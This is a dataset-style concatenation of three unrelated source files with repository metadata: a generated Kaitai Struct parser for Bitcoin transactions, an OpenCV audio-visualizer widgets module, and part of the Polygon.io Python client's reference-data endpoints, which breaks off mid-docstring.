src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 2,107
|
2019-11-05T09:26:16.000Z
|
2022-02-14T13:35:36.000Z
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 30
|
2020-03-11T14:36:43.000Z
|
2022-03-07T04:45:17.000Z
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class BitcoinTransaction(KaitaiStruct):
"""
.. seealso::
Source - https://bitcoin.org/en/developer-guide#transactions
https://en.bitcoin.it/wiki/Transaction
"""
SEQ_FIELDS = ["version", "num_vins", "vins", "num_vouts", "vouts", "locktime"]
| 50.691943
| 164
| 0.553291
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class BitcoinTransaction(KaitaiStruct):
"""
.. seealso::
Source - https://bitcoin.org/en/developer-guide#transactions
https://en.bitcoin.it/wiki/Transaction
"""
SEQ_FIELDS = ["version", "num_vins", "vins", "num_vouts", "vouts", "locktime"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['version']['start'] = self._io.pos()
self.version = self._io.read_u4le()
self._debug['version']['end'] = self._io.pos()
self._debug['num_vins']['start'] = self._io.pos()
self.num_vins = self._io.read_u1()
self._debug['num_vins']['end'] = self._io.pos()
self._debug['vins']['start'] = self._io.pos()
self.vins = [None] * (self.num_vins)
for i in range(self.num_vins):
if not 'arr' in self._debug['vins']:
self._debug['vins']['arr'] = []
self._debug['vins']['arr'].append({'start': self._io.pos()})
_t_vins = BitcoinTransaction.Vin(self._io, self, self._root)
_t_vins._read()
self.vins[i] = _t_vins
self._debug['vins']['arr'][i]['end'] = self._io.pos()
self._debug['vins']['end'] = self._io.pos()
self._debug['num_vouts']['start'] = self._io.pos()
self.num_vouts = self._io.read_u1()
self._debug['num_vouts']['end'] = self._io.pos()
self._debug['vouts']['start'] = self._io.pos()
self.vouts = [None] * (self.num_vouts)
for i in range(self.num_vouts):
if not 'arr' in self._debug['vouts']:
self._debug['vouts']['arr'] = []
self._debug['vouts']['arr'].append({'start': self._io.pos()})
_t_vouts = BitcoinTransaction.Vout(self._io, self, self._root)
_t_vouts._read()
self.vouts[i] = _t_vouts
self._debug['vouts']['arr'][i]['end'] = self._io.pos()
self._debug['vouts']['end'] = self._io.pos()
self._debug['locktime']['start'] = self._io.pos()
self.locktime = self._io.read_u4le()
self._debug['locktime']['end'] = self._io.pos()
class Vin(KaitaiStruct):
SEQ_FIELDS = ["txid", "output_id", "len_script", "script_sig", "end_of_vin"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['txid']['start'] = self._io.pos()
self.txid = self._io.read_bytes(32)
self._debug['txid']['end'] = self._io.pos()
self._debug['output_id']['start'] = self._io.pos()
self.output_id = self._io.read_u4le()
self._debug['output_id']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
self._debug['script_sig']['start'] = self._io.pos()
self._raw_script_sig = self._io.read_bytes(self.len_script)
_io__raw_script_sig = KaitaiStream(BytesIO(self._raw_script_sig))
self.script_sig = BitcoinTransaction.Vin.ScriptSignature(_io__raw_script_sig, self, self._root)
self.script_sig._read()
self._debug['script_sig']['end'] = self._io.pos()
self._debug['end_of_vin']['start'] = self._io.pos()
self.end_of_vin = self._io.read_bytes(4)
self._debug['end_of_vin']['end'] = self._io.pos()
if not self.end_of_vin == b"\xFF\xFF\xFF\xFF":
raise kaitaistruct.ValidationNotEqualError(b"\xFF\xFF\xFF\xFF", self.end_of_vin, self._io, u"/types/vin/seq/4")
class ScriptSignature(KaitaiStruct):
class SighashType(Enum):
sighash_all = 1
sighash_none = 2
sighash_single = 3
sighash_anyonecanpay = 80
SEQ_FIELDS = ["len_sig_stack", "der_sig", "sig_type", "len_pubkey_stack", "pubkey"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['len_sig_stack']['start'] = self._io.pos()
self.len_sig_stack = self._io.read_u1()
self._debug['len_sig_stack']['end'] = self._io.pos()
self._debug['der_sig']['start'] = self._io.pos()
self.der_sig = BitcoinTransaction.Vin.ScriptSignature.DerSignature(self._io, self, self._root)
self.der_sig._read()
self._debug['der_sig']['end'] = self._io.pos()
self._debug['sig_type']['start'] = self._io.pos()
self.sig_type = KaitaiStream.resolve_enum(BitcoinTransaction.Vin.ScriptSignature.SighashType, self._io.read_u1())
self._debug['sig_type']['end'] = self._io.pos()
self._debug['len_pubkey_stack']['start'] = self._io.pos()
self.len_pubkey_stack = self._io.read_u1()
self._debug['len_pubkey_stack']['end'] = self._io.pos()
self._debug['pubkey']['start'] = self._io.pos()
self.pubkey = BitcoinTransaction.Vin.ScriptSignature.PublicKey(self._io, self, self._root)
self.pubkey._read()
self._debug['pubkey']['end'] = self._io.pos()
class DerSignature(KaitaiStruct):
SEQ_FIELDS = ["sequence", "len_sig", "sep_1", "len_sig_r", "sig_r", "sep_2", "len_sig_s", "sig_s"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['sequence']['start'] = self._io.pos()
self.sequence = self._io.read_bytes(1)
self._debug['sequence']['end'] = self._io.pos()
if not self.sequence == b"\x30":
raise kaitaistruct.ValidationNotEqualError(b"\x30", self.sequence, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/0")
self._debug['len_sig']['start'] = self._io.pos()
self.len_sig = self._io.read_u1()
self._debug['len_sig']['end'] = self._io.pos()
self._debug['sep_1']['start'] = self._io.pos()
self.sep_1 = self._io.read_bytes(1)
self._debug['sep_1']['end'] = self._io.pos()
if not self.sep_1 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_1, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/2")
self._debug['len_sig_r']['start'] = self._io.pos()
self.len_sig_r = self._io.read_u1()
self._debug['len_sig_r']['end'] = self._io.pos()
self._debug['sig_r']['start'] = self._io.pos()
self.sig_r = self._io.read_bytes(self.len_sig_r)
self._debug['sig_r']['end'] = self._io.pos()
self._debug['sep_2']['start'] = self._io.pos()
self.sep_2 = self._io.read_bytes(1)
self._debug['sep_2']['end'] = self._io.pos()
if not self.sep_2 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_2, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/5")
self._debug['len_sig_s']['start'] = self._io.pos()
self.len_sig_s = self._io.read_u1()
self._debug['len_sig_s']['end'] = self._io.pos()
self._debug['sig_s']['start'] = self._io.pos()
self.sig_s = self._io.read_bytes(self.len_sig_s)
self._debug['sig_s']['end'] = self._io.pos()
class PublicKey(KaitaiStruct):
SEQ_FIELDS = ["type", "x", "y"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['type']['start'] = self._io.pos()
self.type = self._io.read_u1()
self._debug['type']['end'] = self._io.pos()
self._debug['x']['start'] = self._io.pos()
self.x = self._io.read_bytes(32)
self._debug['x']['end'] = self._io.pos()
self._debug['y']['start'] = self._io.pos()
self.y = self._io.read_bytes(32)
self._debug['y']['end'] = self._io.pos()
class Vout(KaitaiStruct):
SEQ_FIELDS = ["amount", "len_script", "script_pub_key"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['amount']['start'] = self._io.pos()
self.amount = self._io.read_u8le()
self._debug['amount']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
self._debug['script_pub_key']['start'] = self._io.pos()
self.script_pub_key = self._io.read_bytes(self.len_script)
self._debug['script_pub_key']['end'] = self._io.pos()
| 8,770
| 1,078
| 107
|
10c64417440fb35fb29c424a295af5fb46bac46b
| 5,951
|
py
|
Python
|
modules/widgets.py
|
ldvlpr-dev/AudioVisualizer-Release
|
23e18b9b96a7bb54a134603b0e41f70b5d8569ad
|
[
"MIT"
] | 2
|
2021-04-01T16:22:52.000Z
|
2021-05-21T18:01:12.000Z
|
modules/widgets.py
|
ldvlpr-dev/AudioVisualizer-Release
|
23e18b9b96a7bb54a134603b0e41f70b5d8569ad
|
[
"MIT"
] | null | null | null |
modules/widgets.py
|
ldvlpr-dev/AudioVisualizer-Release
|
23e18b9b96a7bb54a134603b0e41f70b5d8569ad
|
[
"MIT"
] | 2
|
2021-03-31T09:00:58.000Z
|
2021-04-28T18:36:31.000Z
|
import cv2
import numpy as np
| 40.209459
| 214
| 0.59469
|
import cv2
import numpy as np
def hex_to_bgr(hx):
hx = hx.lstrip('#')
return tuple(int(hx[i:i + 2], 16) for i in (0, 2, 4))[::-1]
class Rectangle:
def __init__(self, x, y, width, height, max_height, min_db, max_db, color, thickness, reverse):
self.rev = -1 if reverse else 1
self.x = x
self.y = y
self.width = width
self.x2 = self.x + self.width
self.color = color
self.thickness = thickness
self.min_height = height
self.max_height = max_height
self.max_db = max_db
self.min_db = min_db
self.height = height
self.ratio = (self.max_height - self.min_height)/(
self.max_db - self.min_db)
def draw(self, db, dt, frame):
desired_height = db * self.ratio + self.max_height
speed = (desired_height - self.height)/0.1
self.height += speed * dt
self.height = max(
min(self.height, self.max_height), self.min_height)
cv2.rectangle(
frame,
(int(self.x), int(self.y)),
(int(self.x2), int(self.y+self.height)),
color=self.color,
thickness=self.thickness
)
class Circle:
def __init__(self, x, y, width, height, max_height, min_db, max_db, color, thickness):
self.x = x
self.y = y
self.width = width
self.color = color
self.thickness = thickness
self.min_height = height
self.max_height = max_height
self.max_db = max_db
self.min_db = min_db
self.height = height
self.ratio = (self.max_height - self.min_height)/(
self.max_db - self.min_db)
def draw(self, db, dt, frame):
desired_height = db * self.ratio + self.max_height
speed = (desired_height - self.height)/0.1
self.height += speed * dt
self.height = max(
min(self.height, self.max_height), self.min_height)
cv2.circle(frame, center=(int(self.x), int(self.y)), radius=int(
self.height), color=self.color, thickness=self.thickness, lineType=cv2.LINE_AA)
class ColorWoofer:
def __init__(self, **kwargs):
self.name = kwargs["name"]
self.x, self.y, self.freqs = int(
kwargs["x"]), int(kwargs["y"]), kwargs["freqs"]
self.colors = [(255, 0, 0), (0, 0, 255)]
self.thickness = int(kwargs["thickness"])
self.height = int(kwargs["height"])
self.min_decibel = int(kwargs["min_decibel"])
self.max_decibel = int(kwargs["max_decibel"])
self.colorsLen = len(self.colors)
self.ratio = (self.max_decibel-self.min_decibel)/(len(self.colors)-1)
def draw(self, db, frame):
db = min(-sum(db), self.max_decibel)
if db <= self.min_decibel:
color = self.colors[0]
else:
color = self.colors[min(
int(self.ratio*(self.max_decibel-db)), self.colorsLen-1)]
cv2.circle(frame, center=(int(self.x), int(self.y)), radius=int(
self.height), color=color, thickness=self.thickness, lineType=cv2.LINE_AA)
class FreqVisualizerGroup:
def __init__(self, **kwargs):
self.direction = kwargs['direction']
self.type = kwargs["freqvolumetype"]
self.name = kwargs["name"]
self.freqs = kwargs["freqs"]
self.x = 0
self.y = int(kwargs["s_height"]) if self.direction == "up" else 0
self.color = hex_to_bgr(kwargs["color"])
self.thickness = int(kwargs["thickness"])
self.width, self.min_height, self.max_height = int(kwargs[
"width"]), int(kwargs["min_height"]), int(kwargs["max_height"])
self.min_decibel = int(kwargs["min_decibel"])
self.max_decibel = int(kwargs["max_decibel"])
self.shapes = []
if self.type == "rectangle":
for i in range(len(self.freqs)):
self.shapes.append(
Rectangle(self.x + i*self.width, self.y, self.width, self.min_height, self.max_height, self.min_decibel, self.max_decibel, self.color, self.thickness, True if self.direction == "up" else False))
elif self.type == "circle":
self.y = (self.y - int(kwargs["circle_y_gap"]) - self.max_height) if self.direction == "up" else (
self.y + int(kwargs["circle_y_gap"]) + self.max_height)
for i in range(len(self.freqs)):
self.shapes.append(
Circle(self.x + i*self.width, self.y, self.width, self.min_height, self.max_height, self.min_decibel, self.max_decibel, self.color, self.thickness))
def draw(self, dt, db, frame):
for (i, shape) in enumerate(self.shapes):
shape.draw(db[i], dt, frame)
class BeatVisualizer:
def __init__(self, **kwargs):
self.name = kwargs["name"]
self.x, self.y, self.min_height, self.height, self.color = int(kwargs["x"]), int(kwargs[
"y"]), int(kwargs["min_height"]), int(kwargs["min_height"]), hex_to_bgr(kwargs["color"])
self.beat_every_x_sec = int(kwargs["bpm"])/60
self.effect_strenght = 0
self.max_effect_strenght = int(kwargs["max_effect_strenght"])
self.delay_tolerance = kwargs["delay_tolerance"]
self.thickness = int(kwargs["thickness"])
self.first_time = float(kwargs["first_time"])
self.speed = 200
def draw(self, **kwargs):
t = kwargs["time"]-self.first_time
if t < 0:
pass
elif abs(t % self.beat_every_x_sec) < self.delay_tolerance:
self.effect_strenght = self.max_effect_strenght
if self.effect_strenght < 0:
self.effect_strenght = 0
self.effect_strenght -= kwargs["dt"] * self.speed
cv2.circle(kwargs["frame"], center=(int(self.x), int(self.y)), radius=int(
self.min_height + self.effect_strenght), color=self.color, thickness=self.thickness, lineType=cv2.LINE_AA)
| 5,523
| -11
| 403
|
0b5bf0d5fdf0bab0a0494fecb3c1227a2fd961bb
| 21,768
|
py
|
Python
|
polygon/rest/reference.py
|
Polygon-io/client-python
|
beddb8cbf9e77effa52c40878ab5aefa5f8bef85
|
[
"MIT"
] | 1
|
2019-11-19T20:56:27.000Z
|
2019-11-19T20:56:27.000Z
|
polygon/rest/reference.py
|
Polygon-io/client-python
|
beddb8cbf9e77effa52c40878ab5aefa5f8bef85
|
[
"MIT"
] | null | null | null |
polygon/rest/reference.py
|
Polygon-io/client-python
|
beddb8cbf9e77effa52c40878ab5aefa5f8bef85
|
[
"MIT"
] | null | null | null |
from .base import BaseClient
from typing import Optional, Any, Dict, List, Union, Iterator
from .models import (
MarketHoliday,
MarketStatus,
Ticker,
TickerDetails,
TickerNews,
TickerTypes,
Sort,
Order,
AssetClass,
Locale,
Split,
Dividend,
DividendType,
Frequency,
Condition,
DataType,
SIP,
Exchange,
OptionsContract,
)
from urllib3 import HTTPResponse
from datetime import date
| 44.064777
| 308
| 0.642181
|
from .base import BaseClient
from typing import Optional, Any, Dict, List, Union, Iterator
from .models import (
MarketHoliday,
MarketStatus,
Ticker,
TickerDetails,
TickerNews,
TickerTypes,
Sort,
Order,
AssetClass,
Locale,
Split,
Dividend,
DividendType,
Frequency,
Condition,
DataType,
SIP,
Exchange,
OptionsContract,
)
from urllib3 import HTTPResponse
from datetime import date
class MarketsClient(BaseClient):
def get_market_holidays(
self, params: Optional[Dict[str, Any]] = None, raw: bool = False
) -> Union[List[MarketHoliday], HTTPResponse]:
"""
Get upcoming market holidays and their open/close times.
:param params: Any additional query params.
:param raw: Return HTTPResponse object instead of results object.
:return: List of market holidays.
"""
url = "/v1/marketstatus/upcoming"
return self._get(
path=url,
params=params,
deserializer=MarketHoliday.from_dict,
raw=raw,
result_key="",
)
def get_market_status(
self, params: Optional[Dict[str, Any]] = None, raw: bool = False
) -> Union[MarketStatus, HTTPResponse]:
"""
Get the current trading status of the exchanges and overall financial markets.
:param params: Any additional query params.
:param raw: Return HTTPResponse object instead of results object.
:return: Market status.
"""
url = "/v1/marketstatus/now"
return self._get(
path=url, params=params, deserializer=MarketStatus.from_dict, raw=raw
)
class TickersClient(BaseClient):
def list_tickers(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
type: Optional[str] = None,
market: Optional[str] = None,
exchange: Optional[str] = None,
cusip: Optional[int] = None,
cik: Optional[int] = None,
date: Optional[str] = None,
active: Optional[bool] = None,
search: Optional[str] = None,
limit: Optional[int] = 10,
sort: Optional[Union[str, Sort]] = "ticker",
order: Optional[Union[str, Order]] = "asc",
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Ticker], HTTPResponse]:
"""
Query all ticker symbols which are supported by Polygon.io. This API currently includes Stocks/Equities, Crypto, and Forex.
:param ticker: Specify a ticker symbol. Defaults to empty string which queries all tickers.
:param ticker_lt: Ticker less than.
:param ticker_lte: Ticker less than or equal to.
:param ticker_gt: Ticker greater than.
:param ticker_gte: Ticker greater than or equal to.
:param type: Specify the type of the tickers. Find the types that we support via our Ticker Types API. Defaults to empty string which queries all types.
:param market: Filter by market type. By default all markets are included.
:param exchange: Specify the primary exchange of the asset in the ISO code format. Find more information about the ISO codes at the ISO org website. Defaults to empty string which queries all exchanges.
:param cusip: Specify the CUSIP code of the asset you want to search for. Find more information about CUSIP codes at their website. Defaults to empty string which queries all CUSIPs.
:param cik: Specify the CIK of the asset you want to search for. Find more information about CIK codes at their website. Defaults to empty string which queries all CIKs.
:param date: Specify a point in time to retrieve tickers available on that date. Defaults to the most recent available date.
:param search: Search for terms within the ticker and/or company name.
:param active: Specify if the tickers returned should be actively traded on the queried date. Default is true.
:param limit: Limit the size of the response, default is 100 and max is 1000.
:param sort: The field to sort the results on. Default is ticker. If the search query parameter is present, sort is ignored and results are ordered by relevance.
:param order: The order to sort the results on. Default is asc (ascending).
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of tickers.
"""
url = "/v3/reference/tickers"
return self._paginate(
path=url,
params=self._get_params(self.list_tickers, locals()),
raw=raw,
deserializer=Ticker.from_dict,
)
def get_ticker_details(
self,
ticker: Optional[str] = None,
date: Optional[str] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[TickerDetails, HTTPResponse]:
"""
Get a single ticker supported by Polygon.io. This response will have detailed information about the ticker and the company behind it.
:param ticker: The ticker symbol of the asset.
:param date: Specify a point in time to get information about the ticker available on that date. When retrieving information from SEC filings, we compare this date with the period of report date on the SEC filing.
:param params: Any additional query params
:param raw: Return raw object instead of results object
:return: Ticker Details V3
"""
url = f"/v3/reference/tickers/{ticker}"
return self._get(
path=url,
params=params,
deserializer=TickerDetails.from_dict,
raw=raw,
result_key="results",
)
def list_ticker_news(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
published_utc: Optional[str] = None,
published_utc_lt: Optional[str] = None,
published_utc_lte: Optional[str] = None,
published_utc_gt: Optional[str] = None,
published_utc_gte: Optional[str] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[TickerNews], HTTPResponse]:
"""
Get the most recent news articles relating to a stock ticker symbol, including a summary of the article and a link to the original source.
:param ticker: Return results that contain this ticker.
:param published_utc: Return results published on, before, or after this date.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: Ticker News.
"""
url = "/v2/reference/news"
return self._paginate(
path=url,
params=self._get_params(self.list_ticker_news, locals()),
raw=raw,
deserializer=TickerNews.from_dict,
)
def get_ticker_types(
self,
asset_class: Optional[Union[str, AssetClass]] = None,
locale: Optional[Union[str, Locale]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[List[TickerTypes], HTTPResponse]:
"""
List all ticker types that Polygon.io has.
:param asset_class: Filter by asset class.
:param locale: Filter by locale.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: Ticker Types.
"""
url = "/v3/reference/tickers/types"
return self._get(
path=url,
params=params,
deserializer=TickerTypes.from_dict,
raw=raw,
result_key="results",
)
class SplitsClient(BaseClient):
def list_splits(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
execution_date: Optional[Union[str, date]] = None,
execution_date_lt: Optional[Union[str, date]] = None,
execution_date_lte: Optional[Union[str, date]] = None,
execution_date_gt: Optional[Union[str, date]] = None,
execution_date_gte: Optional[Union[str, date]] = None,
reverse_split: Optional[bool] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Split], HTTPResponse]:
"""
Get a list of historical stock splits, including the ticker symbol, the execution date, and the factors of the split ratio.
:param ticker: Return the stock splits that contain this ticker.
:param ticker_lt: Ticker less than.
:param ticker_lte: Ticker less than or equal to.
:param ticker_gt: Ticker greater than.
:param ticker_gte: Ticker greater than or equal to.
:param execution_date: Query by execution date with the format YYYY-MM-DD.
:param execution_date_lt: Execution date less than.
:param execution_date_lte: Execution date less than or equal to.
:param execution_date_gt: Execution date greater than.
:param execution_date_gte: Execution date greater than or equal to.
:param reverse_split: Query for reverse stock splits. A split ratio where split_from is greater than split_to represents a reverse split. By default this filter is not used.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of splits.
"""
url = "/v3/reference/splits"
return self._paginate(
path=url,
params=self._get_params(self.list_splits, locals()),
raw=raw,
deserializer=Split.from_dict,
)
class DividendsClient(BaseClient):
def list_dividends(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
ex_dividend_date: Optional[Union[str, date]] = None,
ex_dividend_date_lt: Optional[Union[str, date]] = None,
ex_dividend_date_lte: Optional[Union[str, date]] = None,
ex_dividend_date_gt: Optional[Union[str, date]] = None,
ex_dividend_date_gte: Optional[Union[str, date]] = None,
record_date: Optional[Union[str, date]] = None,
record_date_lt: Optional[Union[str, date]] = None,
record_date_lte: Optional[Union[str, date]] = None,
record_date_gt: Optional[Union[str, date]] = None,
record_date_gte: Optional[Union[str, date]] = None,
declaration_date: Optional[Union[str, date]] = None,
declaration_date_lt: Optional[Union[str, date]] = None,
declaration_date_lte: Optional[Union[str, date]] = None,
declaration_date_gt: Optional[Union[str, date]] = None,
declaration_date_gte: Optional[Union[str, date]] = None,
pay_date: Optional[Union[str, date]] = None,
pay_date_lt: Optional[Union[str, date]] = None,
pay_date_lte: Optional[Union[str, date]] = None,
pay_date_gt: Optional[Union[str, date]] = None,
pay_date_gte: Optional[Union[str, date]] = None,
frequency: Optional[Union[int, Frequency]] = None,
cash_amount: Optional[float] = None,
cash_amount_lt: Optional[float] = None,
cash_amount_lte: Optional[float] = None,
cash_amount_gt: Optional[float] = None,
cash_amount_gte: Optional[float] = None,
dividend_type: Optional[Union[str, DividendType]] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Dividend], HTTPResponse]:
"""
Get a list of historical cash dividends, including the ticker symbol, declaration date, ex-dividend date, record date, pay date, frequency, and amount.
:param ticker: Return the dividends that contain this ticker.
:param ticker_lt: Ticker less than.
:param ticker_lte: Ticker less than or equal to.
:param ticker_gt: Ticker greater than.
:param ticker_gte: Ticker greater than or equal to.
:param ex_dividend_date: Query by ex-dividend date with the format YYYY-MM-DD.
:param ex_dividend_date_lt: Ex-dividend date less than.
:param ex_dividend_date_lte: Ex-dividend date less than or equal to.
:param ex_dividend_date_gt: Ex-dividend date greater than.
:param ex_dividend_date_gte: Ex-dividend date greater than or equal to.
:param record_date: Query by record date with the format YYYY-MM-DD.
:param record_date_lt: Record date less than.
:param record_date_lte: Record date less than or equal to.
:param record_date_gt: Record date greater than.
:param record_date_gte: Record date greater than or equal to.
:param declaration_date: Query by declaration date with the format YYYY-MM-DD.
:param declaration_date_lt: Declaration date less than.
:param declaration_date_lte: Declaration date less than or equal to.
:param declaration_date_gt: Declaration date greater than.
:param declaration_date_gte: Declaration date greater than or equal to.
:param pay_date: Query by pay date with the format YYYY-MM-DD.
:param pay_date_lt: Pay date less than.
:param pay_date_lte: Pay date less than or equal to.
:param pay_date_gt: Pay date greater than.
:param pay_date_gte: Pay date greater than or equal to.
:param frequency: Query by the number of times per year the dividend is paid out. Possible values are 0 (one-time), 1 (annually), 2 (bi-annually), 4 (quarterly), and 12 (monthly).
:param cash_amount: Query by the cash amount of the dividend.
:param dividend_type: Query by the type of dividend. Dividends that have been paid and/or are expected to be paid on consistent schedules are denoted as CD. Special Cash dividends that have been paid that are infrequent or unusual, and/or can not be expected to occur in the future are denoted as SC.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of dividends.
"""
url = "/v3/reference/dividends"
return self._paginate(
path=url,
params=self._get_params(self.list_dividends, locals()),
raw=raw,
deserializer=Dividend.from_dict,
)
class ConditionsClient(BaseClient):
def list_conditions(
self,
asset_class: Optional[Union[str, AssetClass]] = None,
data_type: Optional[Union[str, DataType]] = None,
id: Optional[int] = None,
sip: Optional[Union[str, SIP]] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Condition], HTTPResponse]:
"""
List all conditions that Polygon.io uses.
:param asset_class: Filter for conditions within a given asset class.
:param data_type: Data types that this condition applies to.
:param id: Filter for conditions with a given ID.
:param sip: Filter by SIP. If the condition contains a mapping for that SIP, the condition will be returned.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of conditions.
"""
url = "/v3/reference/conditions"
return self._paginate(
path=url,
params=self._get_params(self.list_conditions, locals()),
raw=raw,
deserializer=Condition.from_dict,
)
class ExchangesClient(BaseClient):
def get_exchanges(
self,
asset_class: Optional[Union[str, AssetClass]] = None,
locale: Optional[Union[str, Locale]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[List[Exchange], HTTPResponse]:
"""
List all exchanges that Polygon.io knows about.
:param asset_class: Filter by asset class.
:param locale: Filter by locale.
:param params: Any additional query params.
:param raw: Return HTTPResponse object instead of results object.
:return: List of exchanges.
"""
url = "/v3/reference/exchanges"
return self._get(
path=url,
params=params,
deserializer=Exchange.from_dict,
raw=raw,
result_key="results",
)
class ContractsClient(BaseClient):
def get_options_contract(
self,
ticker: str,
as_of: Union[str, date] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[OptionsContract, HTTPResponse]:
"""
Get the most recent trade for a ticker.
:param ticker: The ticker symbol of the asset
:param as_of: Specify a point in time for the contract as of this date with format YYYY-MM-DD.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: Last trade.
"""
url = f"/v3/reference/options/contracts/{ticker}"
return self._get(
path=url,
params=self._get_params(self.get_options_contract, locals()),
result_key="results",
deserializer=OptionsContract.from_dict,
raw=raw,
)
def list_options_contracts(
self,
underlying_ticker: Optional[str] = None,
underlying_ticker_lt: Optional[str] = None,
underlying_ticker_lte: Optional[str] = None,
underlying_ticker_gt: Optional[str] = None,
underlying_ticker_gte: Optional[str] = None,
contract_type: Optional[str] = None,
expiration_date: Optional[Union[str, date]] = None,
expiration_date_lt: Optional[Union[str, date]] = None,
expiration_date_lte: Optional[Union[str, date]] = None,
expiration_date_gt: Optional[Union[str, date]] = None,
expiration_date_gte: Optional[Union[str, date]] = None,
as_of: Optional[Union[str, date]] = None,
strike_price: Optional[float] = None,
strike_price_lt: Optional[float] = None,
strike_price_lte: Optional[float] = None,
strike_price_gt: Optional[float] = None,
strike_price_gte: Optional[float] = None,
expired: Optional[bool] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[OptionsContract], HTTPResponse]:
"""
List historical options contracts.
:param underlying_ticker: Query for contracts relating to an underlying stock ticker.
:param contract_type: Query by the type of contract.
:param expiration_date: Query by contract expiration with date format YYYY-MM-DD.
:param as_of: Specify a point in time for contracts as of this date with format YYYY-MM-DD.
:param strike_price: Query by strike price of a contract.
:param expired: Query for expired contracts.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object
